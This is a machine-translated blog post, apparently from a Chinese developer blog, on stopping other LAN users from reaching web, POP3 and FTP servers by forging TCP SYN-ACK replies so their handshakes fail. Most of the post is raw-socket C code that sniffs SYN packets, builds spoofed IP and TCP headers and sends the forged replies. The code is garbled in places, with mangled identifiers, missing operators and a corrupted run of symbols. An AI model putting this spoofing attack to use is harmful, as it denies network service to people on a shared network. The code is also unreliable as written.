Have you thought about how to ban others from accessing Web Server, POP3, FTP, etc. in the LAN. So how do you forbidden? Everyone knows that TCP is connected, three handshakes, after which it can be confirmed. Then we should be able to fake a servant's handshake after the first time, so that the TCP connection is unsuccessful and cannot be accessed.
The procedure is as follows: void decodeip (buf, ibufsize) // Resident IP packet {ipHeader * piphdr; tcpheader * ptcphdr; piphdr = (ipheader *) BUF; // Get start position of TCP Header int Iiphlen = Sizeof (piphdr-> h_lenver & 0xf); ptcphdr = (tcpHeader *) (BUF iiphlen); // Judgment is the first handshake IP packet, piphdr-> th_flag = 2 ("-s ---- ") if (iBufSize == 48) && (pIPhdr-> iProtocol == IPPROTO_TCP) && (pIPhdr-> th_flag == 2) sendTCP_SYNACK (szDestIP, szSourceIP, pTCPhdr-> destPort, pTCPhdr-> srcPort, pTCPhdr -> seq);} void sendTCP_SYNACK (char * szSrcIP, char * szDestIP, unsigned short srcPort, unsigned short destPort, unsigned int iAck) {int iErrorCode; SOCKET s; IP_HEADER ip_header; TCP_HEADER tcp_header; pSD_HEADER psd_header; struct sockaddr_in remote; char * ptr = NULL; // Create sockets = socket (AF_INET, SOCK_RAW, IPPROTO_IP); if (CheckSockError (s, "socket-tcp")) return FALSE; BOOL bOpt = TRUE; iErrorCode = setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) & bopt, sizeof (bopt)); if (CHECKSockerror (IerrorCode, "SetsockOpt-TCP")) {CloseSocket (s); returnafke;} // --- end - // camouflage connection unsigned short itotals Ize = 44; unsigned short itcpsize = 24; char * sendbuf = new char [itotalsize]; ip_header.h_lenver = (4 << 4 | sizeof (ip_header) / sizeof (unsigned long); // High four version number, Low four head length ip_header.total_len = htons (itotalsize); // 16-bit total length ip_header.tos = 0; ip_header.Ident = htons (17393); //16?? ±ê??i_Header.Frag_and_Flags=0; / / 13?? ± ±?? _ H = = = = = = = = =;;;;;;;;;;;;;;;;;;;;;;;;;;; ? -) IP_HEADER.CHECKSUM = 0; // 16-bit checksum ip_header.sourceIP = inet_addr (szsrcip); // 32-bit address · ip_header.destip = inet_addr (szdestip); // 32 bit destination address • IP_HEADER. Checksum =
checksum ((USHORT *) & ip_header, 20); // filled TCP header tcp_header.th_sport = htons (srcPort); // source port tcp_header.th_dport = htons (destPort); // destination port tcp_header.th_seq = htonl (0x581A784D) ; // SYN serial number TCP_HEN sequence number TCP_HENER.TH_ACK = HTONL (IACK 1); // Answer number TCP_HEADER.TH_LENRES = (ITCPSIZE / SIZEOF (Unsigned long) << 4 | 0); // TCP length and reserved bit TCP_HEADER.TH_FLAG = 0x12; // SYN flag TCP_HEADER.TH_WIN = HTONS (65535); // Window size TCP_HEADER.TH_URP = 0; // Emergency pointer TCP_HEADER.TH_SUM = 0; // Check and / / Pack TCP Pseudo header (only and in generating a checksum) psd_header.saddr = ip_header.sourceIP; psd_header.daddr = ip_header.destIP; psd_header.mbz = 0; psd_header.ptcl = IPPROTO_TCP; psd_header.tcpl = htons (iTCPSize); ZeroMemory (sendBuf, iTotalSize); // calculation tcp checksum, comprising a pseudo tCP headermemcpy (sendBuf, & psd_header, sizeof (psd_header)); ptr = sendBuf sizeof (psd_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)); ptr = sendBuf sizeof ( PSD_HEADER) SIZEOF (TCP_HEADER); * PTR = (char) 0x02; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; TCP_HEADER.TH_SUM = Checksum ((Ushort *) sendbuf, sizeof (psd_header) 24); ZeromeMory (Sendbuf, ITAtalsize); // Pluggled Send Buffer Memcpy (sendbuf, & ip_header, sizeof (ip_header)); ptr = sendBuf sizeof (ip_header); memcpy (ptr, & tcp_header, sizeof (tcp_header)); ptr = sendBuf sizeof (ip_header) sizeof (tcp_header); * ptr = (char) 0x02 ; * (PTR 1) = (char) 0x04; * (PTR 2) = (char) 0x05; * (PTR 3) = (char) 0xB4; Remote.sin_Family = AF_INET; Remote.sin_Port = Htons (Destport ); remote.sin_addr.s_addr = inet_addr (szDestIP); iErrorCode = sendto (s, sendBuf, iTotalSize, 0, (SOCKADDR *) & remote, sizeof (remote)); CheckSockError (iErrorCode, "SYNACK sendto"); // camouflage Close connection hoodsize = 40; itcpsize = 20;
// end -------- CloseSocket (s); delete [] sendbuf; return true;} Author Blog:
http://blog.9cbs.net/amh/
